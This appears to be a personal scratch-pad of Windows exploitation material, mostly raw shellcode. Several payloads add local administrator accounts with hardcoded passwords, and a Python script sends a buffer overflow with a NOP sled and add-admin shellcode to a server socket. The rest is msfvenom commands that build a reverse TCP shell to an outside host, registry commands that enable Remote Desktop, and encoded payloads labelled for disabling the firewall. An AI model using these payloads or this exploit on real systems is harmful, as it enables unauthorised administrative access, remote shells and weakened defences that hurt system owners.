random_shellcode_-_scratch-pad

RANDOM SHELLCODE - SCRATCH-PAD \xeB\x02\xBA\xC7\x93\xBF\x77\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x61\x6C\x63

=======================================================

Add Admin User Shellcode (194 bytes) - Any Windows Version

Title: Add Admin User Shellcode (194 bytes) - Any Windows Version Release date: 21/06/2014 Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) Size: 194 byte (NULL free) Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 Username: BroK3n Password: BroK3n

\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7

===========================================

/* Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa) Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111 Greetz: offsec and inj3ct0r teams printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");

\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61\x64\x64\x00

printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");

==================================================

!/usr/bin/python

import socket

8 nops \x90\x90\x90\x90\x90\x90\x90\x90

SER_ADDR = input("Type the server IP address: ")

SER_PORT = int(input("Type the server port: "))

\x53\x93\x42\x7E tested and does work

\x31\x61\x78\xc7

SER_ADDR = "127.0.0.1" SER_PORT = 1001

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) my_sock.connect((SER_ADDR, SER_PORT)) print("Connection established")

data = my_sock.recv(1024) print(data.decode('utf-8'))

buffer = ('\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x53\x93\x42\x7E\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61\x64\x64\x00\x90\x90\x90\x90\x90\x90\x90\x90')

my_sock.sendall(buffer) data = my_sock.recv(1024) print(data.decode('utf-8'))

=======================

msfvenom -p windows/exec cmd="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f" -f c --platform windows -b "\x00\x30"

msfvenom -p windows/shell/reverse_tcp LHOST=10.185.10.20 LPORT=443 -f c --platform windows -b "\x00\x30"

\xd9\xcb\xd9\x74\x24\xf4\x5d\x29\xc9\xb1\x54\xbe\x10\xd9\x15\xab\x31\x75\x18\x03\x75\x18\x83\xed\xec\x3b\xe0\x57\xe4\x3e\x0b\xa8\xf4\x5e\x85\x4d\xc5\x5e\xf1\x06\x75\x6f\x71\x4a\x79\x04\xd7\x7f\x0a\x68\xf0\x70\xbb\xc7\x26\xbe\x3c\x7b\x1a\xa1\xbe\x86\x4f\x01\xff\x48\x82\x40\x38\xb4\x6f\x10\x91\xb2\xc2\x85\x96\x8f\xde\x2e\xe4\x1e\x67\xd2\xbc\x21\x46\x45\xb7\x7b\x48\x67\x14\xf0\xc1\x7f\x79\x3d\x9b\xf4\x49\xc9\x1a\xdd\x80\x32\xb0\x20\x2d\xc1\xc8\x65\x89\x3a\xbf\x9f\xea\xc7\xb8\x5b\x91\x13\x4c\x78\x31\xd7\xf6\xa4\xc0\x34\x60\x2e\xce\xf1\xe6\x68\xd2\x04\x2a\x03\xee\x8d\xcd\xc4\x67\xd5\xe9\xc0\x2c\x8d\x90\x51\x88\x60\xac\x82\x73\xdc\x08\xc8\x99\x09\x21\x93\xf5\xfe\x08\x2c\x05\x69\x1a\x5f\x37\x36\xb0\xf7\x7b\xbf\x1e\x0f\x7c\xea\xe7\x9f\x83\x15\x18\x89\x47\x41\x48\xa1\x6e\xea\x03\x31\x8f\x3f\xb9\x34\x07\xca\x87\x3d\xc3\xa2\xf5\x41\xea\x89\x73\xa7\xbc\xbd\xd3\x78\x7c\x6e\x94\x28\x14\x64\x1b\x16\x04\x87\xf1\x3f\xae\x68\xac\x68\x46\x10\xf5\xe3\xf7\xdd\x23\x8e\x37\x55\xc6\x6e\xf9\x9e\xa3\x7c\xed\xfe\x4b\x7d\xed\x6a\x4c\x17\xe9\x3c\x1b\x8f\xf3\x19\x6b\x10\x0c\x4c\xef\x57\xf2\x11\xc6\x2c\xc4\x87\x66\x5b\x28\x48\x67\x9b\x7e\x02\x67\xf3\x26\x76\x34\xe6\x29\xa3\x28\xbb\xbf\x4c\x19\x6f\x68\x25\xa7\x56\x5e\xea\x58\xbd\xdd\xed\xa7\x43\xc3\x55\xc0\xbb\x43\x66\x10\xd6\x43\x36\x78\x2d\x6c\xb9\x48\xce\xa7\x92\xc0\x45\x29\x50\x70\x59\x60\x34\x2c\x5a\x86\xed\x39\xd5\x69\x12\x46\x17\x56\xc4\x7f\x6d\x9f\xd4\x3b\x7e\xaa\x79\x6d\x15\xd4\x2e\x6d\x3c

====================

rdp enable

firewall disable - works

\xdb\xdc\xd9\x74\x24\xf4\x58\xba\x86\xd7\xd1\xb6\x33\xc9\xb1\x37\x31\x50\x19\x83\xe8\xfc\x03\x50\x15\x64\x22\x2d\x5e\xea\xcd\xce\x9f\x8a\x44\x2b\xae\x8a\x33\x3f\x81\x3a\x37\x6d\x2e\xb1\x15\x86\xa5\xb7\xb1\xa9\x0e\x7d\xe4\x84\x8f\x2d\xd4\x87\x13\x2f\x09\x68\x2d\xe0\x5c\x69\x6a\x1c\xac\x3b\x23\x6b\x03\xac\x40\x21\x98\x47\x1a\xa4\x98\xb4\xeb\xc7\x89\x6a\x67\x9e\x09\x8c\xa4\xab\x03\x96\xa9\x91\xda\x2d\x19\x6e\xdd\xe7\x53\x8f\x72\xc6\x5b\x62\x8a\x0e\x5b\x9c\xf9\x66\x9f\x21\xfa\xbc\xdd\xfd\x8f\x26\x45\x76\x37\x83\x77\x5b\xae\x40\x7b\x10\xa4\x0f\x98\xa7\x69\x24\xa4\x2c\x8c\xeb\x2c\x76\xab\x2f\x74\x2d\xd2\x76\xd0\x80\xeb\x69\xbb\x7d\x4e\xe1\x56\x6a\xe3\xa8\x3c\x6d\x71\xd7\x73\x6d\x89\xd8\x23\x05\xb8\x53\xac\x52\x45\xb6\x88\xbc\xa7\x13\xe5\x54\x7e\xf6\x44\x39\x81\x2c\x8a\x47\x02\xc5\x73\xbc\x1a\xac\x76\xf9\x9c\x5c\x0b\x92\x48\x63\xb8\x93\x58\x0d\x5b\x1f\x10\xba\x83\xb9\xbf\x48\xa1\x32\x21\xc1\x45\x9c\xd2\x7c\xe2\xfc\x7b\x0f\x67\x93\xe7\x8a\x57\x0f\x81\x27\xf9\xad\x3d\xad\xf9

secuid \xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61\x64\x64\x00

==================

add user joseph j0Seph123

\xba\x08\x07\x33\x57\xda\xc4\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x36\x31\x50\x15\x03\x50\x15\x83\xc0\x04\xe2\xfd\xfb\xdb\xd5\xfd\x03\x1c\xba\x74\xe6\x2d\xfa\xe2\x62\x1d\xca\x61\x26\x92\xa1\x27\xd3\x21\xc7\xef\xd4\x82\x62\xc9\xdb\x13\xde\x29\x7d\x90\x1d\x7d\x5d\xa9\xed\x70\x9c\xee\x10\x78\xcc\xa7\x5f\x2e\xe1\xcc\x2a\xf2\x8a\x9f\xbb\x72\x6e\x57\xbd\x53\x21\xe3\xe4\x73\xc3\x20\x9d\x3a\xdb\x25\x98\xf5\x50\x9d\x56\x04\xb1\xef\x97\xaa\xfc\xdf\x65\xb3\x39\xe7\x95\xc6\x33\x1b\x2b\xd0\x87\x61\xf7\x55\x1c\xc1\x7c\xcd\xf8\xf3\x51\x8b\x8b\xf8\x1e\xd8\xd4\x1c\xa0\x0d\x6f\x18\x29\xb0\xa0\xa8\x69\x96\x64\xf0\x2a\xb7\x3d\x5c\x9c\xc8\x5e\x3f\x41\x6c\x14\xd2\x96\x1d\x77\xb9\x69\x90\x0d\x8f\x6a\xaa\x0d\xa0\x02\x9b\x86\x2f\x54\x24\x4d\x14\xba\xc7\x44\x61\x53\x51\x0d\xc8\x3e\x62\xfb\x0f\x47\xe0\x0e\xf0\xbc\xf8\x7a\xf5\xf9\xbf\x97\x87\x92\x55\x98\x34\x92\x7c\xf6\xdf\x18\x5e\x72\x53\x84\xec\x5c\xf9\x29\x63\xf8\x8d\xdd\xa3\x68\x5e\x4d\xc6\x1c\xf6\x40\x3a\xee\x26\x8c\x5b\x74\x43\xd2

add joseph as admin

\xba\xa3\xf8\x9c\x07\xda\xcc\xd9\x74\x24\xf4\x58\x29\xc9\xb1\x39\x31\x50\x14\x03\x50\x14\x83\xc0\x04\x41\x0d\x60\xef\x07\xee\x99\xf0\x67\x66\x7c\xc1\xa7\x1c\xf4\x72\x17\x56\x58\x7f\xdc\x3a\x49\xf4\x90\x92\x7e\xbd\x1e\xc5\xb1\x3e\x32\x35\xd3\xbc\x48\x6a\x33\xfc\x83\x7f\x32\x39\xf9\x72\x66\x92\x76\x20\x97\x97\xc2\xf9\x1c\xeb\xc3\x79\xc0\xbc\xe2\xa8\x57\xb6\xbd\x6a\x59\x1b\xb6\x22\x41\x78\xf2\xfd\xfa\x4a\x89\xff\x2a\x83\x72\x53\x13\x2b\x81\xad\x53\x8c\x79\xd8\xad\xee\x04\xdb\x69\x8c\xd2\x6e\x6a\x36\x91\xc9\x56\xc6\x76\x8f\x1d\xc4\x33\xdb\x7a\xc9\xc2\x08\xf1\xf5\x4f\xaf\xd6\x7f\x0b\x94\xf2\x24\xc8\xb5\xa3\x80\xbf\xca\xb4\x6a\x60\x6f\xbe\x87\x75\x02\x9d\xcd\x88\x90\x9b\xa0\x8a\xaa\xa3\x94\xe2\x9b\x28\x7b\x75\x24\xfb\x3f\x99\xc6\x2e\x4a\x31\x5f\xbb\xf7\x5c\x60\x11\x3b\x58\xe3\x90\xc4\x9f\xfb\xd0\xc1\xe4\xbb\x09\xb8\x75\x2e\x2e\x6f\x76\x7b\x40\xea\xfc\xa4\xf1\x9b\x9f\xc5\x65\x03\x2d\x69\x03\xbb\xf1\x14\x8f\x56\x98\xb8\x26\xda\x2e\x37\xd8\x68\xa1\xc5\x69\xb1\x57\x45\xfd\xd4\xd7\xf1\x21\x38\x76\x66\x46\x46

==================== REG.exe ADD "\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

\xbb\x0c\x98\x0c\x8f\xda\xd0\xd9\x74\x24\xf4\x5a\x33\xc9\xb1\x3f\x83\xea\xfc\x31\x5a\x0f\x03\x5a\x03\x7a\xf9\x73\xf3\xf8\x02\x8c\x03\x9d\x8b\x69\x32\x9d\xe8\xfa\x64\x2d\x7a\xae\x88\xc6\x2e\x5b\x1b\xaa\xe6\x6c\xac\x01\xd1\x43\x2d\x39\x21\xc5\xad\x40\x76\x25\x8c\x8a\x8b\x24\xc9\xf7\x66\x74\x82\x7c\xd4\x69\xa7\xc9\xe5\x02\xfb\xdc\x6d\xf6\x4b\xde\x5c\xa9\xc0\xb9\x7e\x4b\x05\xb2\x36\x53\x4a\xff\x81\xe8\xb8\x8b\x13\x39\xf1\x74\xbf\x04\x3e\x87\xc1\x41\xf8\x78\xb4\xbb\xfb\x05\xcf\x7f\x86\xd1\x5a\x64\x20\x91\xfd\x40\xd1\x76\x9b\x03\xdd\x33\xef\x4c\xc1\xc2\x3c\xe7\xfd\x4f\xc3\x28\x74\x0b\xe0\xec\xdd\xcf\x89\xb5\xbb\xbe\xb6\xa6\x64\x1e\x13\xac\x88\x4b\x2e\xef\xc6\x8a\xbc\x95\xa4\x8d\xbe\x95\x98\xe5\x8f\x1e\x77\x71\x10\xf5\x3c\x9d\xf2\xdc\x48\x36\xab\xb4\xf1\x5b\x4c\x63\x35\x62\xcf\x86\xc5\x91\xcf\xe2\xc0\xde\x57\x1e\xb8\x4f\x32\x20\x6f\x6f\x17\x52\xea\xe8\xb8\xf2\x90\x92\x98\xbc\x13\x1e\x80\x63\xef\xef\x71\xdd\xa3\xb0\x38\x9c\x78\x07\x8a\x50\x3b\xc4\x55\x3e\x97\xaf\x28\x83\x62\x42\xc1\x66\xe2\xd6\x66\x06\x94\x62\x1b\xb7\x04\xd8\xbe\x33\x97\xb1\x2e\xc8\x65\x21\xc3\x64\xec\xcf\x76\xec\x80\x4e\xe5\xee

=========================

REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

\xda\xdd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x3c\xbe\x89\x82\xd7\x22\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x7c\x7e\x3f\xa0\x7e\x7f\xc0\xc5\xf7\x9a\xf1\xc5\x63\xee\xa2\xf5\xe0\xa2\x4e\x7d\xa4\x56\xc4\xf3\x60\x58\x6d\xb9\x56\x57\x6e\x92\xaa\xf6\xec\xe9\xfe\xd8\xcd\x21\xf3\x19\x09\x5f\xf9\x48\xc2\x2b\xaf\x7c\x67\x61\x73\xf6\x3b\x67\xf3\xeb\x8c\x86\xd2\xbd\x87\xd0\xf4\x3c\x4b\x69\xbd\x26\x88\x54\x74\xdc\x7a\x22\x87\x34\xb3\xcb\x2b\x79\x7b\x3e\x32\xbd\xbc\xa1\x41\xb7\xbe\x5c\x51\x0c\xbc\xba\xd4\x97\x66\x48\x4e\x7c\x96\x9d\x08\xf7\x94\x6a\x5f\x5f\xb9\x6d\x8c\xeb\xc5\xe6\x33\x3c\x4c\xbc\x17\x98\x14\x66\x36\xb9\xf0\xc9\x47\xd9\x5a\xb5\xed\x91\x77\xa2\x9c\xfb\x1d\x35\x13\x86\x50\x35\x2b\x89\xc4\x5e\x1a\x02\x8b\x19\xa3\xc1\xef\xc6\x46\xc0\x05\x6f\xde\x81\xa7\xf2\xe1\x7f\xeb\x0a\x61\x8a\x94\xe8\x79\xff\x91\xb5\x3e\x13\xe8\xa6\xaa\x13\x5f\xc6\xff\x46\x1a\x7f\xd1\x03\xdc\x1a\x0d\x8d\x58\xa1\x6d\x45\x2a\x65\x20\x06\xf5\x26\xee\xed\x48\x8a\x7b\x9c\x20\x69\xed\x14\x86\x1e\x9f\xa0\x7a\x8e\x33\x1a\x1e\x24\x88\xf3\x8e\xb0\x7c\x63\x23\x6d\xe5\x09\xd6\xe4\x8b\x8c\x44\xf7

=================================